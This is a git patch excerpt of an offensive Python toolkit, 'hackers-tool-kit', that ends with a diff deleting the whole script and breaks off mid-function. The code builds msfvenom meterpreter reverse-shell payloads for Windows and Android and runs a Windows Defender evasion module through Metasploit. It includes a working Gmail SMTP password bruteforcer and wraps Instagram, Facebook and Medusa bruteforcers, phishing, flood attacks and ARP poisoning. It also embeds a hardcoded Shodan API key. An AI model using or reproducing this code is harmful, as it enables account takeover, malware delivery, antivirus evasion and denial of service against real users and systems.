hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > handler.rc') + os.system('echo "set payload {0}\n" >> handler.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> handler.rc') + os.system('echo "set LPORT {0}\n" >> handler.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> handler.rc'.format(name)) + os.system('echo "run\n" >> handler.rc') + os.system("service postgresql restart") + os.system('msfconsole -r handler.rc') + os.system('rm -rf handler.rc') +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> handler.rc'.format(f)) + os.system('echo "show options\n" >> handler.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r handler.rc') + os.system('rm -rf handler.rc') +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +def datalist(): + os.system('echo "hosts\n" >> handler.rc') + os.system('echo "services\n" >> handler.rc') + os.system("service postgresql restart") + os.system('msfconsole -r handler.rc') + os.system('rm -rf handler.rc') +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +def upgrade(): + os.system("apt update && apt upgrade") +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + mainbanner() + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@unkn0wn_bali\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arppois": + appois() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + found = True +mainbanner() +main() From 027c6d1d1b424c2262e990a6d987f785b4ca3098 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Fri, 22 Feb 2019 04:30:14 +0100 Subject: [PATCH 019/214] Delete htk.py --- htk.py | 1966 -------------------------------------------------------- 1 file changed, 1966 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index 96bc626..0000000 --- a/htk.py +++ /dev/null @@ -1,1966 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @unkn0wn_bali -#i do not give you permission to edit this script without my credit -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -def mainbanner(): - print N+""" _ _ _ _ _ _ _ - _ _ _ _ _ _ _ - | |__ __ _ ___| | _____ _ __ ___ | |_ ___ ___ | | | | _(_) |_ - | '_ \ / _` |/ __| |/ / _ \ '__/ __|_____| __/ _ \ / _ \| |_____| |/ / | __| - | | | | (_| | (__| < __/ | \__ \_____| || (_) | (_) | |_____| <| | |_ \033[91m - |_| |_|\__,_|\___|_|\_\___|_| |___/ \__\___/ \___/|_| |_|\_\_|\__|\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @unkn0wn_bali On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -? : displays this message -clear : clears screen except for banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal -arppois : ARP poisoning -sslscan : ssl scan a host -payload : make a metasploit payload of your choice -crunch : Make wordlists -traff : shows your internet traffic -resa : reset account password -resu : reset unix password -hashid : find the type of hash of a hash -wafwoof : check a web application for firewall -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -\033[91m---------------------------------------------------------------------------------\033[0m - """ -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) -def wifite(): - os.system("wifite") -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -def netdev(): - os.system("netdiscover") -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def 